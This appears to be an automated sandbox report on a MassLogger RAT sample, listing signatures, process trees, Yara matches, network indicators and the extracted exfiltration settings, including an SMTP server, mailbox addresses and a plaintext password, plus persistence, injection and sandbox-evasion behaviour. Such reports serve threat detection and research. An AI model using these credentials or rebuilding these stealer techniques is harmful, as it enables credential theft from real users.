Windows Analysis Report
Ref#116670.exe

Overview

General Information

Sample name: Ref#116670.exe
Analysis ID: 1567428
MD5: 9d61b7e79d1b236cea4327b484a3d53f
SHA1: 1df1ffda46b2710fbe2d415a508afd609d6723a4
SHA256: 2c3a0cbf5b82b051c9d3db1307f68db266eba44352a8f750e5553dbc58b5cf91
Tags: exe user-abuse_ch

Detection

MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#116670.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\Ref#116670.exe" MD5: 9D61B7E79D1B236CEA4327B484A3D53F)
    • InstallUtil.exe (PID: 6780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • vdvfyt.exe (PID: 5704 cmdline: "C:\Users\user\AppData\Roaming\vdvfyt.exe" MD5: 9D61B7E79D1B236CEA4327B484A3D53F)
      • InstallUtil.exe (PID: 4956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
{"EXfil Mode": "SMTP", "From": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Server": "juguly.shop", "To": "camill@juguly.shop", "Port": 587}
Source | Rule | Description | Author | Strings
00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | (listed below)
  • 0xf527:$a1: get_encryptedPassword
  • 0xf84f:$a2: get_encryptedUsername
  • 0xf2c2:$a3: get_timePasswordChanged
  • 0xf3e3:$a4: get_passwordField
  • 0xf53d:$a5: set_encryptedPassword
  • 0x10e99:$a7: get_logins
  • 0x10b4a:$a8: GetOutlookPasswords
  • 0x1093c:$a9: StartKeylogger
  • 0x10de9:$a10: KeyLoggerEventArgs
  • 0x10999:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
Source | Rule | Description | Author | Strings
5.2.vdvfyt.exe.3ad97e0.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.Ref#116670.exe.6950000.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.Ref#116670.exe.3689550.2.raw.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
0.2.Ref#116670.exe.3689550.2.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.Ref#116670.exe.3689550.2.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

                    System Summary

                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 6000, ProcessName: wscript.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 6000, ProcessName: wscript.exe

                    Data Obfuscation

                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#116670.exe, ProcessId: 6648, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T15:20:35.641728+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49716 | 132.226.247.73 | 80 | TCP
2024-12-03T15:21:00.094889+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49774 | 132.226.247.73 | 80 | TCP

                    AV Detection

                    Source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Server": "juguly.shop", "To": "camill@juguly.shop", "Port": 587}
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeReversingLabs: Detection: 18%
                    Source: Ref#116670.exeReversingLabs: Detection: 18%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeJoe Sandbox ML: detected
                    Source: Ref#116670.exeJoe Sandbox ML: detected

                    Location Tracking

                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Ref#116670.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49722 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49780 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49738 version: TLS 1.2
                    Source: Ref#116670.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C35000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C35000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A0ED77h0_2_06A0EA69
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A0ED77h0_2_06A0EA78
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A08AC8h0_2_06A088B9
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A08AC8h0_2_06A088C8
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A081A4h0_2_06A08130
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A081A4h0_2_06A08140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 01285762h3_2_01285347
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 01285039h3_2_01284D88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 01285762h3_2_0128568F
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DBED77h5_2_06DBEA78
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DBED77h5_2_06DBEA69
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DB8AC8h5_2_06DB88C8
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DB8AC8h5_2_06DB88B9
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DB81A4h5_2_06DB8140
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DB81A4h5_2_06DB8130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00BE5782h7_2_00BE5367
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00BE51B9h7_2_00BE4F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00BE5782h7_2_00BE56AF
                    Source: global trafficHTTP traffic detected: GET /RMDT HTTP/1.1Host: oshi.atConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                    Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
                    Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49716 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49774 -> 132.226.247.73:80
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: oshi.at
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000290B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0?
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0_
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000293D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000293D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/RMDT
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228d
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228l
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: https://www.ssl.com/repository0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443

                    System Summary

                    Source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Users\user\Desktop\Ref#116670.exe | Code function: 0_2_05CB2828 NtResumeThread,0_2_05CB2828
                    Source: C:\Users\user\Desktop\Ref#116670.exe | Code function: 0_2_05CB02E8 NtProtectVirtualMemory,0_2_05CB02E8
                    Source: C:\Users\user\Desktop\Ref#116670.exe | Code function: 0_2_05CB2820 NtResumeThread,0_2_05CB2820
                    Source: C:\Users\user\Desktop\Ref#116670.exe | Code function: 0_2_05CB02E2 NtProtectVirtualMemory,0_2_05CB02E2
